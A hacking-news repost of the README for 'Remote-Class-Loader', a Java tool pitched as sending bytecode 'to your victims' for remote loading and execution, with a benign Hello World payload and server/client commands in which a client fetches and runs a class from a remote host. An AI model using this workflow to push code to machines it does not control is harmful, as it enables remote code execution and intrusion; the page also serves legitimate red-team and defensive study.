Ethical Hacking News Hubb
Advertisement Banner
  • Home
  • News
  • Ethical Hackers
  • Contact
No Result
View All Result
  • Home
  • News
  • Ethical Hackers
  • Contact
No Result
View All Result
Wellnessnewshubb
No Result
View All Result
Home News

Remote-Class-Loader – Tool to send Java bytecode to your victims to load and execute using Java ClassLoader together with Reflect API

admin by admin
October 3, 2022
in News




This tool allows you to send Java bytecode in the form of class files to your clients (or potential targets) to load and execute using Java ClassLoader together with Reflect API. The client receives the class file from the server and return the respective execution output. Payloads must be written in Java and compiled before starting the server.

  • Client-server architecture
  • Remote loading of Java class files
  • In-transit encryption using ChaCha20 cipher
  • Settings defined via args
  • Keepalive mechanism to re-establish communication if server restarts

Tool has been tested using OpenJDK 11 with JRE Java Package, both on Windows and Linux (zip portable version). Java version should be 11 or higher due to dependencies.

https://www.openlogic.com/openjdk-downloads

Assuming you have the following Hello World payload in the Payload.java file:

Payload { public static String exec() { String output = “”; try { output = “Hello world from client!”; } catch (Exception e) { e.printStackTrace(); } return output; } }” dir=”auto”>

//Payload.java
public class Payload {
public static String exec() {
String output = "";
try {
output = "Hello world from client!";
} catch (Exception e) {
e.printStackTrace();
}
return output;
}
}

Then you should compile and produce the respective Payload.class file.

To run the server process listening on port 1337 on all net interfaces:

$ java -jar java-class-loader.jar -server -address 0.0.0.0 -port 1337 -classfile Payload.class

Running as server
Server running on 0.0.0.0:1337
Generated new key: TOU3TLn1QsayL1K6tbNOzDK69MstouEyNLMGqzqNIrQ=

On the client side, you may use the same JAR package with the -client flag and use the symmetric key generated by server. Specify the server IP address and port to connect to. You may also change the class name and class method (defaults are Payload and String exec() respectively). Additionally, you can specify -keepalive to keep the client requesting class file from server while maintaining the connection.

$ java -jar java-class-loader.jar -client -address 192.168.1.73 -port 1337 -key TOU3TLn1QsayL1K6tbNOzDK69MstouEyNLMGqzqNIrQ=

Running as client
Connecting to 192.168.1.73:1337
Received 593 bytes from server
Output from invoked class method: Hello world from client!
Sent 24 bytes to server

Refer to https://vrls.ws/posts/2022/08/building-a-remote-class-loader-in-java/ for a blog post related with the development of this tool.

  1. https://github.com/rebeyond/Behinder

  2. https://github.com/AntSwordProject/antSword

  3. https://cyberandramen.net/2022/02/18/a-tale-of-two-shells/

  4. https://www.sangfor.com/blog/cybersecurity/behinder-v30-analysis

  5. https://xz.aliyun.com/t/2799

  6. https://medium.com/@m01e/jsp-webshell-cookbook-part-1-6836844ceee7

  7. https://venishjoe.net/post/dynamically-load-compiled-java-class/

  8. https://users.cs.jmu.edu/bernstdh/web/common/lectures/slides_class-loaders_remote.php

  9. https://www.javainterviewpoint.com/chacha20-poly1305-encryption-and-decryption/

  10. https://openjdk.org/jeps/329

  11. https://docs.oracle.com/en/java/javase/11/docs/api/java.base/java/lang/ClassLoader.html

  12. https://docs.oracle.com/en/java/javase/11/docs/api/java.base/java/lang/reflect/Method.html





Source link

Tags: cybersecurityethical hackinghack androidhack apphack wordpresshacker newshackinghacking tools for windowskeyloggerkitkitploitpassword brute forcepenetration testingpentestpentest androidpentest linuxpentest toolkitpentest toolsspy tool kitspywaretools
Previous Post

海外での Tokyo MX の視聴方法(日本国外)

Next Post

Popular YouTube Channel Caught Distributing Malicious Tor Browser Installer

Next Post

Popular YouTube Channel Caught Distributing Malicious Tor Browser Installer

Recommended

New “Earth Longzhi” APT Targets Ukraine and Asian Countries with Custom Cobalt Strike Loaders

4 months ago

Backdoor-Generator – Obfuscated Powershell Reverse Backdoor With Flipper Zero And USB Rubber Ducky Payloads

1 month ago

© Ethical Hacking News Hubb All rights reserved.

Use of these names, logos, and brands does not imply endorsement unless specified. By using this site, you agree to the Privacy Policy and Terms & Conditions.

Navigate Site

  • Home
  • News
  • Ethical Hackers
  • Contact

Newsletter Sign Up.

No Result
View All Result
  • Home
  • News
  • Ethical Hackers
  • Contact

© 2022 Ethical Hacking News Hubb All rights reserved.